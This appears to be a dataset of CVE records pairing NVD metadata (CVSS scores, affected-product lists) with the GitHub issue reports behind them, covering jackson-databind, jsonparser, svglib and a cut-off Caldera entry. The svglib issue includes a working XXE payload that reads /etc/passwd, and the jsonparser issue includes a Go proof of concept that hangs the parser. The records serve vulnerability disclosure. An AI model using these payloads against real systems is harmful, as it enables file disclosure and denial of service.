https://api.github.com/repos/FasterXML/jackson-databind/issues/2659/comments
0
2020-03-16T00:52:40Z
2020-03-26T16:33:53Z
https://github.com/FasterXML/jackson-databind/issues/2659
581,901,777
2,659
1,120
CVE-2020-10673
2020-03-18T22:15:12.407
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2660" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "9FB021E3-0529-4F99-B880-66FDAC2F889D", "versionEndExcluding": "2.6.7.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "021014B2-DC51-481C-BCFE-5857EFBDEDDA", "versionEndExcluding": null, "versionEndIncluding": "8.1.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.6", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "37C8EE84-A840-4132-B331-C7D450B1FBBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "1FBF422E-3F67-4599-A7C1-0E2E4224553A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "72F28CE3-F835-4458-8D70-CBE9FC2F7E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "9F058FDA-04BC-4F32-830D-206983770692", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "378A6656-252B-4929-83EA-BC107FDFD357", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2660
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding a class of `caucho-quercus` library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-10673 Reporter: threedr3am'follower Fix is included in: * 2.9.10.4 * 2.6.7.4 (see https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.6.7.x) * Does not affect 2.10.0 and later
Block one more gadget type (caucho-quercus, CVE-2020-10673)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2660/comments
1
2020-03-18T01:32:04Z
2021-02-23T19:52:40Z
https://github.com/FasterXML/jackson-databind/issues/2660
583,400,227
2,660
1,121
CVE-2020-10675
2020-03-19T14:15:12.287
The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/buger/jsonparser/issues/188" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4C7PV6KEUUM76V4B2J5IFN2U6LEOWB67/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6KUHKDQSEYJNROA66OMN6AAQMGAAN6WI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/buger/jsonparser/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4C7PV6KEUUM76V4B2J5IFN2U6LEOWB67/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6KUHKDQSEYJNROA66OMN6AAQMGAAN6WI/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsonparser_project:jsonparser:*:*:*:*:*:*:*:*", "matchCriteriaId": "514A5230-F052-4276-8CD1-6B82B6350428", "versionEndExcluding": "1.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/buger/jsonparser/issues/188
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "buger", "jsonparser" ]
Hi. A call to function `Delete` may cause infinite loop. I wish you could take a look. https://play.golang.org/p/kzKY-Z9ty_j ``` package main import ( "fmt" "github.com/buger/jsonparser" ) func main() { data1 := []byte("^_�^C^A^@[") data2 := "" // sink: this function leads to an inifinite loop jsonparser.Delete(data1, data2) // code go hanged. So the last line won't be printed fmt.Println("Things go right!") } ```
infinite loop in Delete
https://api.github.com/repos/buger/jsonparser/issues/188/comments
3
2020-03-09T10:40:07Z
2021-09-14T06:24:28Z
https://github.com/buger/jsonparser/issues/188
577,810,888
188
1,122
CVE-2020-10799
2020-03-20T23:15:12.863
The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/deeplook/svglib/issues/229" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/deeplook/svglib/issues/229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:svglib_project:svglib:*:*:*:*:*:*:*:*", "matchCriteriaId": "AC597EC8-A947-4752-9AC2-4E455871C207", "versionEndExcluding": null, "versionEndIncluding": "0.9.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/deeplook/svglib/issues/229
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "deeplook", "svglib" ]
Hi! I found that I can perform XXE attack (https://en.wikipedia.org/wiki/XML_external_entity_attack) when using svg2rlg function Code: ``` saved_image_path = 'test_png.png' with open("./test.svg", "wb") as f: f.write(image) drawing = svg2rlg(image_path) renderPM.drawToFile(drawing, saved_image_path, fmt="PNG") ``` Payload (test.svg) ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "/etc/passwd"> ]> <svg width="10cm" height="3cm" viewBox="0 0 1000 300" xmlns="http://www.w3.org/2000/svg" version="1.1"> <desc>Example text01 - 'Hello, out there' in blue</desc> <text x="250" y="150" font-family="Verdana" font-size="55" fill="blue" > &xxe; </text> <!-- Show outline of canvas using 'rect' element --> <rect x="1" y="1" width="998" height="298" fill="none" stroke="blue" stroke-width="2" /> </svg> ```
No disabling external entity expansion (XXE)
https://api.github.com/repos/deeplook/svglib/issues/229/comments
9
2020-02-25T11:18:21Z
2020-03-22T16:13:59Z
https://github.com/deeplook/svglib/issues/229
570,497,104
229
1,123
CVE-2020-10807
2020-03-22T16:15:12.417
auth_svc in Caldera before 2.6.5 allows authentication bypass (for REST API requests) via a forged "localhost" string in the HTTP Host header.
